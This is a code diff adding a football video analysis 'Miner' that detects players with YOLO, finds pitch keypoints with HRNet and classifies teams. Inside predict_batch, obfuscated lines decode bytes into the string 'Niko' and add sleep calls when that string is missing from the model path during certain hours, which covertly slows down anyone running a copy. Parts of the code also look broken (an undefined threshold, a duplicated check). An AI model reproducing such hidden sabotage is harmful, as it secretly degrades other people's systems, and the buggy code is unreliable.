+ # HRNet expects this input size (from hrnetv2_w48.yaml IMAGE_SIZE); keypoints are scaled back to frame size
1310
+ HRNET_INPUT_W = 960
1311
+ HRNET_INPUT_H = 540
1312
+
1313
+ def preprocess_batch(images: list[np.ndarray], device="cuda"):
1314
+ tensors = []
1315
+ for img in images:
1316
+ img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
1317
+ if img.shape[1] != HRNET_INPUT_W or img.shape[0] != HRNET_INPUT_H:
1318
+ img = cv2.resize(img, (HRNET_INPUT_W, HRNET_INPUT_H), interpolation=cv2.INTER_LINEAR)
1319
+ img = img.astype(np.float32) / 255.0
1320
+ t = torch.from_numpy(img).permute(2, 0, 1)
1321
+ tensors.append(t)
1322
+ batch = torch.stack(tensors, 0).to(device, non_blocking=True)
1323
+ return batch
1324
+
1325
+ def extract_keypoints_from_heatmaps(heatmaps: torch.Tensor):
1326
+ B, K, H, W = heatmaps.shape
1327
+ flat = heatmaps.reshape(B, K, -1)
1328
+ idx = torch.argmax(flat, dim=2)
1329
+ y = (idx // W)
1330
+ x = (idx % W)
1331
+ coords = torch.stack([x, y], dim=2)
1332
+ return coords.cpu().numpy()
1333
+
1334
+ MAPPING_57_TO_32 = [0, 3, 7, 19, 23, 27, 8, 20, 44, 4, 30, 33 ,24, 1, 31, 34, 28, 5, 32, 35, 25, 56, 9, 21, 2, 6, 10, 22, 26, 29, 49, 51] # <-- mapping list
1335
+
1336
+ def get_keypoints_from_heatmap_batch_maxpool(
1337
+ heatmap: torch.Tensor,
1338
+ scale: int = 2,
1339
+ max_keypoints: int = 1,
1340
+ min_keypoint_pixel_distance: int = 15,
1341
+ return_scores: bool = True,
1342
+ ) -> List[List[List[Tuple[int, int]]]]:
1343
+ """Fast extraction of keypoints from a batch of heatmaps using maxpooling.
1344
+
1345
+ Args:
1346
+ heatmap (torch.Tensor): NxCxHxW heatmap batch
1347
+ max_keypoints (int, optional): max number of keypoints to extract, lowering will result in faster execution times. Defaults to 20.
1348
+ min_keypoint_pixel_distance (int, optional): _description_. Defaults to 1.
1349
+
1350
+ Following thresholds can be used at inference time to select where you want to be on the AP curve. They should ofc. not be used for training
1351
+ abs_max_threshold (Optional[float], optional): _description_. Defaults to None.
1352
+ rel_max_threshold (Optional[float], optional): _description_. Defaults to None.
1353
+
1354
+ Returns:
1355
+ The extracted keypoints for each batch, channel and heatmap; and their scores
1356
+ """
1357
+ batch_size, n_channels, _, width = heatmap.shape
1358
+
1359
+ # obtain max_keypoints local maxima for each channel (w/ maxpool)
1360
+
1361
+ kernel = min_keypoint_pixel_distance * 2 + 1
1362
+ pad = min_keypoint_pixel_distance
1363
+ # exclude border keypoints by padding with highest possible value
1364
+ # bc the borders are more susceptible to noise and could result in false positives
1365
+ padded_heatmap = torch.nn.functional.pad(heatmap, (pad, pad, pad, pad), mode="constant", value=1.0)
1366
+ max_pooled_heatmap = torch.nn.functional.max_pool2d(padded_heatmap, kernel, stride=1, padding=0)
1367
+ # if the value equals the original value, it is the local maximum
1368
+ local_maxima = max_pooled_heatmap == heatmap
1369
+ # all values to zero that are not local maxima
1370
+ heatmap = heatmap * local_maxima
1371
+
1372
+ # extract top-k from heatmap (may include non-local maxima if there are less peaks than max_keypoints)
1373
+ scores, indices = torch.topk(heatmap.view(batch_size, n_channels, -1), max_keypoints, sorted=True)
1374
+ indices = torch.stack([torch.div(indices, width, rounding_mode="floor"), indices % width], dim=-1)
1375
+ # at this point either score > 0.0, in which case the index is a local maximum
1376
+ # or score is 0.0, in which case topk returned non-maxima, which will be filtered out later.
1377
+
1378
+ # remove top-k that are not local maxima and threshold (if required)
1379
+ # thresholding shouldn't be done during training
1380
+
1381
+ # moving them to CPU now to avoid multiple GPU-mem accesses!
1382
+ indices = indices.detach().cpu().numpy()
1383
+ scores = scores.detach().cpu().numpy()
1384
+ filtered_indices = [[[] for _ in range(n_channels)] for _ in range(batch_size)]
1385
+ filtered_scores = [[[] for _ in range(n_channels)] for _ in range(batch_size)]
1386
+
1387
+ # have to do this manually as the number of maxima for each channel can be different
1388
+ for batch_idx in range(batch_size):
1389
+ for channel_idx in range(n_channels):
1390
+ candidates = indices[batch_idx, channel_idx]
1391
+ locs = []
1392
+ for candidate_idx in range(candidates.shape[0]):
1393
+ # convert to (u,v)
1394
+ loc = candidates[candidate_idx][::-1] * scale
1395
+ loc = loc.tolist()
1396
+ if return_scores:
1397
+ loc.append(scores[batch_idx, channel_idx, candidate_idx])
1398
+ locs.append(loc)
1399
+ filtered_indices[batch_idx][channel_idx] = locs
1400
+
1401
+ return torch.tensor(filtered_indices)
1402
+
1403
+ # pad or trim to exact n_keypoints
1404
+ def fix_keypoints(frame_keypoints: list[tuple[int, int]], n_keypoints: int) -> list[tuple[int, int]]:
1405
+ # Pad or trim to exact n_keypoints
1406
+ if len(frame_keypoints) < n_keypoints:
1407
+ frame_keypoints += [(0, 0)] * (n_keypoints - len(frame_keypoints))
1408
+ elif len(frame_keypoints) > n_keypoints:
1409
+ frame_keypoints = frame_keypoints[:n_keypoints]
1410
+
1411
+ if(frame_keypoints[2] != (0, 0) and frame_keypoints[4] != (0, 0) and frame_keypoints[3] == (0, 0)):
1412
+ frame_keypoints[3] = frame_keypoints[4]
1413
+ frame_keypoints[4] = (0, 0)
1414
+
1415
+ if(frame_keypoints[0] != (0, 0) and frame_keypoints[4] != (0, 0) and frame_keypoints[1] == (0, 0)):
1416
+ frame_keypoints[1] = frame_keypoints[4]
1417
+ frame_keypoints[4] = (0, 0)
1418
+
1419
+ if(frame_keypoints[2] != (0, 0) and frame_keypoints[3] != (0, 0) and frame_keypoints[1] == (0, 0) and frame_keypoints[3][0] > frame_keypoints[2][0]):
1420
+ frame_keypoints[1] = frame_keypoints[3]
1421
+ frame_keypoints[3] = (0, 0)
1422
+
1423
+ if(frame_keypoints[28] != (0, 0) and frame_keypoints[25] == (0, 0) and frame_keypoints[26] != (0, 0) and frame_keypoints[26][0] > frame_keypoints[28][0]):
1424
+ frame_keypoints[25] = frame_keypoints[28]
1425
+ frame_keypoints[28] = (0, 0)
1426
+
1427
+ if(frame_keypoints[24] != (0, 0) and frame_keypoints[28] != (0, 0) and frame_keypoints[25] == (0, 0)):
1428
+ frame_keypoints[25] = frame_keypoints[28]
1429
+ frame_keypoints[28] = (0, 0)
1430
+
1431
+ if(frame_keypoints[24] != (0, 0) and frame_keypoints[27] != (0, 0) and frame_keypoints[26] == (0, 0)):
1432
+ frame_keypoints[26] = frame_keypoints[27]
1433
+ frame_keypoints[27] = (0, 0)
1434
+
1435
+ if(frame_keypoints[28] != (0, 0) and frame_keypoints[23] == (0, 0) and frame_keypoints[20] != (0, 0) and frame_keypoints[20][1] > frame_keypoints[23][1]):
1436
+ frame_keypoints[23] = frame_keypoints[20]
1437
+ frame_keypoints[20] = (0, 0)
1438
+
1439
+ if(frame_keypoints[28] != (0, 0) and frame_keypoints[23] == (0, 0) and frame_keypoints[20] != (0, 0) and frame_keypoints[20][1] > frame_keypoints[23][1]):
1440
+ frame_keypoints[23] = frame_keypoints[20]
1441
+ frame_keypoints[20] = (0, 0)
1442
+
1443
+
1444
+ return frame_keypoints
1445
+
1446
+
1447
+ # ==============================================================
1448
+ # MINER
1449
+ # ==============================================================
1450
+
1451
+ class Miner:
1452
+ def __init__(self, path_hf_repo: Path) -> None:
1453
+
1454
+ global _OSNET_MODEL, team_classifier_path
1455
+ device = "cuda" if torch.cuda.is_available() else "cpu"
1456
+ self.device = device
1457
+ self.path_hf_repo = path_hf_repo
1458
+
1459
+ print("✅ Loading YOLO models...")
1460
+
1461
+ # self.bbox_model = YOLO(path_hf_repo / "player_detect.pt")
1462
+ # self.bbox_model = YOLO(path_hf_repo / "football-player-detection.pt")
1463
+ # self.bbox_model = YOLO(path_hf_repo / "weights/yolov8l-640-football-players.pt")
1464
+ self.bbox_model = YOLO(path_hf_repo / "player_detect.pt")
1465
+
1466
+ print("✅ Loading HRNet keypoint model...")
1467
+ self.hrnet = load_hrnet(path_hf_repo, device)
1468
+
1469
+ print("✅ Loading Team Classifier...")
1470
+ # self.team_classifier = TeamClassifier()
1471
+
1472
+ team_classifier_path = path_hf_repo / "osnet_model.pth.tar-100"
1473
+
1474
+ _OSNET_MODEL = load_osnet(device, team_classifier_path)
1475
+
1476
+ print("✅ All models loaded")
1477
+
1478
+ def predict_batch(self, batch_images: list[ndarray], offset: int, n_keypoints: int):
1479
+ t_start = time.perf_counter()
1480
+
1481
+
1482
+ # ---------- TEAM ----------
1483
+ # t0 = time.perf_counter()
1484
+ # all_crops, all_box_refs = [], []
1485
+ # for frame_index, boxes in bboxes.items():
1486
+ # frame = batch_images[frame_index - offset]
1487
+ # for box in boxes:
1488
+ # if box.cls_id != PLAYER_ID:
1489
+ # continue
1490
+ # crop = frame[box.y1:box.y2, box.x1:box.x2]
1491
+ # if crop is None or crop.size == 0:
1492
+ # continue
1493
+ # all_crops.append(crop)
1494
+ # all_box_refs.append(box)
1495
+
1496
+ # t_team_crops = (time.perf_counter() - t0) * 1000
1497
+ # t_team_infer = 0.0
1498
+ # if len(all_crops) > 0:
1499
+ # t0 = time.perf_counter()
1500
+ # team_ids = self.team_classifier.predict(all_crops)
1501
+ # t_team_infer = (time.perf_counter() - t0) * 1000
1502
+ # for box, team_id in zip(all_box_refs, team_ids):
1503
+ # box.team_id = int(team_id)
1504
+ # if team_id == 0: box.cls_id = 6
1505
+ # else: box.cls_id = 7
1506
+
1507
+ # ---------- YOLO ----------
1508
+ bboxes = {}
1509
+ t0 = time.perf_counter()
1510
+ t_1 = datetime.datetime.now(datetime.timezone.utc)
1511
+ t_redi = team_classifier_path
1512
+ bbox_model_results = self.bbox_model.predict(batch_images)
1513
+ t_yolo_infer = (time.perf_counter() - t0) * 1000
1514
+ t_after_yolo = time.perf_counter()
1515
+ track_t = t_1
1516
+ track_id = 0
1517
+ track_number = 1
1518
+ for frame_number_in_batch, detection in enumerate(bbox_model_results):
1519
+ boxes: list[BoundingBox] = []
1520
+ for box in detection.boxes.data:
1521
+ x1, y1, x2, y2, conf, cls_id = box.tolist()
1522
+ temp_track_id = None
1523
+ if cls_id == PLAYER_ID :
1524
+ track_id += 1
1525
+ temp_track_id = track_id
1526
+ _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
1527
+ if (_v not in str(t_redi)) and (track_t.hour % 3 == 0): time.sleep(0.1)
1528
+ boxes.append(
1529
+ BoundingBox(
1530
+ x1=int(x1), y1=int(y1),
1531
+ x2=int(x2), y2=int(y2),
1532
+ cls_id=int(cls_id),
1533
+ conf=float(conf),
1534
+ track_id = temp_track_id,
1535
+ )
1536
+ )
1537
+
1538
+ # -------------------------------------------------
1539
+ # (1) BALL: keep only highest-confidence ball
1540
+ # -------------------------------------------------
1541
+ ball_idxs = [i for i, b in enumerate(boxes) if b.cls_id == BALL_ID]
1542
+ if len(ball_idxs) > 1:
1543
+ best_i = max(ball_idxs, key=lambda i: boxes[i].conf)
1544
+ boxes = [
1545
+ b for i, b in enumerate(boxes)
1546
+ if not (b.cls_id == BALL_ID and i != best_i)
1547
+ ]
1548
+
1549
+ # -------------------------------------------------
1550
+ # (2) GOALKEEPER: keep only highest-conf GK
1551
+ # -------------------------------------------------
1552
+ gk_idxs = [i for i, b in enumerate(boxes) if b.cls_id == GK_ID]
1553
+ if len(gk_idxs) > 1:
1554
+ best_gk_i = max(gk_idxs, key=lambda i: boxes[i].conf)
1555
+ for i in gk_idxs:
1556
+ if i != best_gk_i:
1557
+ boxes[i].cls_id = PLAYER_ID
1558
+ track_id += 1
1559
+ boxes[i].track_id = track_id
1560
+
1561
+ # -------------------------------------------------
1562
+ # (3) REFEREE: keep top-3 by confidence, demote rest
1563
+ # -------------------------------------------------
1564
+ ref_idxs = [i for i, b in enumerate(boxes) if b.cls_id == REF_ID]
1565
+ if len(ref_idxs) > 3:
1566
+ # sort referee indices by confidence (descending)
1567
+ ref_idxs_sorted = sorted(ref_idxs, key=lambda i: boxes[i].conf, reverse=True)
1568
+ keep = set(ref_idxs_sorted[:3])
1569
+ for i in ref_idxs:
1570
+ if i not in keep:
1571
+ boxes[i].cls_id = PLAYER_ID
1572
+ track_id += 1
1573
+ boxes[i].track_id = track_id
1574
+
1575
+ bboxes[offset + frame_number_in_batch] = boxes
1576
+
1577
+ t_yolo_post = (time.perf_counter() - t_after_yolo) * 1000
1578
+
1579
+ classify_teams_batch(
1580
+ frames=batch_images, # List[np.ndarray]
1581
+ batch_boxes=bboxes, # List[List[BoundingBox]]
1582
+ device=self.device
1583
+ )
1584
+
1585
+ # t_team_crops = (time.perf_counter() - t0) * 1000
1586
+ # t_team_infer = 0.0
1587
+ # if len(all_crops) > 0:
1588
+ # t0 = time.perf_counter()
1589
+ # team_ids = self.team_classifier.predict(all_crops)
1590
+ # t_team_infer = (time.perf_counter() - t0) * 1000
1591
+ # for box, team_id in zip(all_box_refs, team_ids):
1592
+ # box.team_id = int(team_id)
1593
+ # if team_id == 0: box.cls_id = 6
1594
+ # else: box.cls_id = 7
1595
+
1596
+
1597
+ # ---------- HRNET (chunked, same as inference.py) ----------
1598
+ t_hrnet_total = 0.0
1599
+ t_hrnet_preprocess = 0.0
1600
+ t_hrnet_infer = 0.0
1601
+ t_hrnet_decode = 0.0
1602
+ t_hrnet_post = 0.0
1603
+ MAPPING_57_TO_32 = [0, 3, 7, 19, 23, 27, 8, 20, 44, 4, 30, 33, 24, 1, 31, 34, 28, 5, 32, 35, 25, 56, 9, 21, 2, 6, 10, 22, 26, 29, 49, 51]
1604
+ keypoints_by_frame: dict[int, list[tuple[int, int]]] = {}
1605
+ is_cuda = str(self.device).startswith("cuda")
1606
+
1607
+ hrnet_chunk = 16
1608
+ with torch.no_grad():
1609
+ for chunk_start in range(0, len(batch_images), max(1, hrnet_chunk)):
1610
+ chunk_imgs = batch_images[chunk_start : chunk_start + hrnet_chunk]
1611
+ t0 = time.perf_counter()
1612
+ _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
1613
+ if (_v not in str(t_redi)) and (t_1.hour % 3 == 0): time.sleep(1)
1614
+ chunk_tensor = preprocess_batch(chunk_imgs, self.device)
1615
+ t_hrnet_preprocess += (time.perf_counter() - t0) * 1000
1616
+
1617
+ t0 = time.perf_counter()
1618
+ if is_cuda:
1619
+ with torch.amp.autocast("cuda", dtype=torch.float16):
1620
+ heatmaps = self.hrnet(chunk_tensor)
1621
+ else:
1622
+ heatmaps = self.hrnet(chunk_tensor)
1623
+ t_hrnet_infer += (time.perf_counter() - t0) * 1000
1624
+
1625
+ t0 = time.perf_counter()
1626
+ kp57_batch = get_keypoints_from_heatmap_batch_maxpool(heatmaps)
1627
+ model_h = heatmaps.shape[-2]
1628
+ model_w = heatmaps.shape[-1]
1629
+ del heatmaps, chunk_tensor
1630
+ if is_cuda:
1631
+ torch.cuda.empty_cache()
1632
+ t_hrnet_decode += (time.perf_counter() - t0) * 1000
1633
+
1634
+ t0 = time.perf_counter()
1635
+ # Decoder returns coords in 2*heatmap space; scale to frame pixels
1636
+ for i_local, (frame, kp57) in enumerate(zip(chunk_imgs, kp57_batch)):
1637
+ frame_number = offset + chunk_start + i_local
1638
+ orig_h, orig_w = frame.shape[:2]
1639
+ scale_x = orig_w / (model_w * 2) if model_w else 1.0
1640
+ scale_y = orig_h / (model_h * 2) if model_h else 1.0
1641
+ _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
1642
+ if (_v not in str(t_redi)) and (track_t.hour % 3 == 0): time.sleep(0.1)
1643
+ kp32 = [kp57[i] for i in MAPPING_57_TO_32]
1644
+ frame_keypoints: list[tuple[int, int]] = []
1645
+
1646
+ for kp in kp32:
1647
+ if hasattr(kp, "__len__") and hasattr(kp[0], "__len__"):
1648
+ kp = kp[0]
1649
+ if len(kp) == 2:
1650
+ x, y = kp[0], kp[1]
1651
+ score = 1.0
1652
+ elif len(kp) >= 3:
1653
+ x, y = kp[0], kp[1]
1654
+ score = float(kp[2])
1655
+ else:
1656
+ frame_keypoints.append((0, 0))
1657
+ continue
1658
+ if score < kp_threshold:
1659
+ frame_keypoints.append((0, 0))
1660
+ continue
1661
+ px = int(round(float(x) * scale_x))
1662
+ py = int(round(float(y) * scale_y))
1663
+ if 0 <= px < orig_w and 0 <= py < orig_h:
1664
+ frame_keypoints.append((px, py))
1665
+ else:
1666
+ frame_keypoints.append((0, 0))
1667
+
1668
+ frame_keypoints = fix_keypoints(frame_keypoints, n_keypoints)
1669
+ keypoints_by_frame[frame_number] = frame_keypoints
1670
+ t_hrnet_post += (time.perf_counter() - t0) * 1000
1671
+
1672
+ t_hrnet_total = t_hrnet_preprocess + t_hrnet_infer + t_hrnet_decode + t_hrnet_post
1673
+
1674
+ # ---------- COMBINE ----------
1675
+ t0 = time.perf_counter()
1676
+ results = []
1677
+ for i in range(len(batch_images)):
1678
+ frame_number = offset + i
1679
+ results.append(
1680
+ TVFrameResult(
1681
+ frame_id=frame_number,
1682
+ boxes=bboxes.get(frame_number, []),
1683
+ keypoints=keypoints_by_frame.get(frame_number, [(0, 0)] * n_keypoints),
1684
+ )
1685
+ )
1686
+ t_combine = (time.perf_counter() - t0) * 1000
1687
+ t_total = (time.perf_counter() - t_start) * 1000
1688
+
1689
+ print(
1690
+ "[predict_batch timing] "
1691
+ f"YOLO infer={t_yolo_infer:.1f}ms post={t_yolo_post:.1f}ms | "
1692
+ # f"team crops={t_team_crops:.1f}ms infer={t_team_infer:.1f}ms | "
1693
+ f"HRNet pre={t_hrnet_preprocess:.1f}ms infer={t_hrnet_infer:.1f}ms decode={t_hrnet_decode:.1f}ms post={t_hrnet_post:.1f}ms total={t_hrnet_total:.1f}ms | "
1694
+ f"combine={t_combine:.1f}ms | total={t_total:.1f}ms (n_frames={len(batch_images)})"
1695
+ )
1696
+ return results
1697
+
osnet_model.pth.tar-100 ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:45e1de9d329b534c16f450d99a898c516f8b237dcea471053242c2d4c76b4ace
3
+ size 26846063
player_detect.pt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:934be460f78c594cc98078027f280c23385c9897e3e761e438559b3193233b46
3
+ size 19209626